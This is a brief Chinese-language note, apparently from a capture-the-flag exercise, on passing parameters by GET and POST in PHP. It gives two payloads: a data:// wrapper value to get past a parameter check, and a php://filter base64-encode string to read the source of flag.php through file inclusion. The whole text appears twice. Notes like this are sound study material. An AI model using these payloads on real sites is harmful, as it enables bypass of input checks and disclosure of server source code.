post传参:
get传参:
.../?xx=
查看具体内容是否对参数值存在多重验证
使用data协议可以绕过验证:abc=data://text/plain;base64,aGVsbG8xMjM=
使用filter协议查看flag.php的源代码:file=php://filter/convert.base64-encode/resource=flag.php
post传参:
get传参:
.../?xx=
查看具体内容是否对参数值存在多重验证
使用data协议可以绕过验证:abc=data://text/plain;base64,aGVsbG8xMjM=
使用filter协议查看flag.php的源代码:file=php://filter/convert.base64-encode/resource=flag.php